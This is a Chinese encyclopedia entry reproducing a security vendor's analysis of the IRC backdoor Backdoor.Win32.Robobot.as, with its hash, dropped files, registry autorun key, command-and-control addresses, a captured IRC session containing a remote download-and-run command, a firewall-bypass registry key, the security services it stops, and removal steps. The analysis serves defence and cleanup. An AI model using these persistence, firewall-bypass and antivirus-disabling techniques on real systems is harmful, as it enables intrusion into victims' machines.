| 词条 | Backdoor.Win32.Robobot.as |
| 释义 | 该病毒运行后,连接网络下载病毒体到本机运行。添加注册表自动运行项以随系统引导病毒体。病毒运行后监听网络,等待接收指令。受感染用户可能会被利用进行各种恶操作。 基本信息病毒名称: Backdoor.Win32 病毒类型: 后门类 文件 MD5: 336E561DCDC23C4BD447394AB4DFC71D 公开范围: 完全公开 危害等级: 4 文件长度: 脱壳前 29,184 字节,脱壳后88,576 字节 感染系统: windows 9X以上版本 开发工具: Microsoft Visual C++ 7.0 加壳工具: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 行为分析1 、 衍生病毒文件: %WinDir%\\system\\smss.exe %Documents and Settings%\\ 当前用户名 \\Local Settings\\Temp\\2exinjs.aa.exe 2 、 新建下列册表键值: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\.nvsvc Value: String: "%WinDir\\system\\smss.exe /w" 3 、 连接下列地址下载病毒体: (66.197.23*.3*) /up/injs.aa.exe 4、 连接的 IRC 服务器地址: numegaserver (66.7.2*0.24*) 5、 连接 IRC 服务器后的交互如下: NICK jfac-1_9127_1268 USER jfac-1_9127_1268 "jfac-1_9127_1268" :jfac-1_9127_1268 :numegaserver 001 jfac-1_9127_1268 :Welcome to the SOMEnet IRC Network jfac-1_9127_1268!~jfac-1_91@222.171.7.213 :numegaserver 002 jfac-1_9127_1268 :Your host is numegaserver, running version ircd(Bahamut-1.4.35)-1.1(01)-02 :numegaserver 003 jfac-1_9127_1268 :This server was created Thu Feb 8 2007 at 15:11:12 UTC :numegaserver 004 jfac-1_9127_1268 numegaserver ircd (Bahamut-1.4.35)-1.1(01)- 02 oOiwscrRkKnfydaAbgheFjH biklLmMnoprRstvc7BeEwxX :numegaserver 005 jfac-1_9127_1268 NOQUIT WATCH=128 SAFELIST MODES=6 MAXCHANNELS=20 MAXBANS=100 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 CHANTYPES=# PREFIX=(ov)@+ STATUSMSG=@+ NETWORK=SOMEnet SILENCE=10 EXCEPTS CHARSET=ascii CHANMODES=bBeEX,k,l,7chiLmMnOprRstwx CODEPAGES 8BNICKS=YES MANICKS=YES MAWNICKS=YES 8BNCI=YES 8BCNCI=YES NICKIDEN :are available on this server // 服务器返回信息 :numegaserver 251 jfac-1_9127_1268 :There are 28 users and 0 invisible on 1 servers :numegaserver 255 jfac-1_9127_1268 :I have 28 clients and 0 servers :numegaserver 265 jfac-1_9127_1268 :Current local users: 28 Max: 39 :numegaserver 266 jfac-1_9127_1268 :Current global users: 28 Max: 39 :numegaserver 422 jfac-1_9127_1268 :MOTD File is missing :jfac-1_9127_1268 MODE jfac-1_9127_1268 :+i // 下载文件 :numegaserver 700 jfac-1_9127_1268 ISO8859-5 :is now your translation scheme :inj1!~devel@66.7.200.245 PRIVMSG jfac-1_9127_1268 :exec /injs.aa.exe?jfac-1_9127_1268 injs.aa.exe 1268 // 保持连接 PING :numegaserver PONG :PING :numegaserver PONG : 6、 此文件用来监听网络: %Documents and Settings%\\ 当前用户名 \\Local Settings\\Temp\\2exinjs.aa.exe 7 、病毒可能会修改下列注册表键值以穿过 Windows 防火墙: HKLM\\SYSTEM\\CurrentControlSet \\Services\\SharedAccess\\Parameters \\FirewallPolicy\\StandardProfile \\AuthorizedApplications\\List',键值:0 8 、病毒试图关闭或停止下列安全服务: KAVPersonal50 Wuauserv Navaps Symantec Core LC SAVScan Kavsvc Wscsvc 注: % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 , windows95/98/me 中默认的安装路径是 C:\\Windows\\System , windowsXP 中默认的安装路径是 C:\\Windows\\System32 。 清除方案1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 ) 2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。 (1) 使用安天木马防线断开网络,结束病毒进程: %WinDir%\\system\\smss.exe %Documents and Settings%\\ 当前用户名 \\Local Settings\\Temp\\2exinjs.aa.exe (2) 删除并恢复病毒添加与修改的注册表键值: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\.nvsvc Value: String: "%WinDir\\system \\smss.exe /w" (3)恢复病毒修改的注册表项目,删除病毒添加的注册表项。 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Windows\\CurrentVersion\\Run 键值 : 字串: " QQ " = " %WINDIR%\\QQ.exe " (4) 删除病毒释放文件: %WinDir%\\system\\smss.exe %Documents and Settings%\\ 当前用户名 \\Local Settings\\Temp\\2exinjs.aa.exe |
| 随便看 |
|
百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。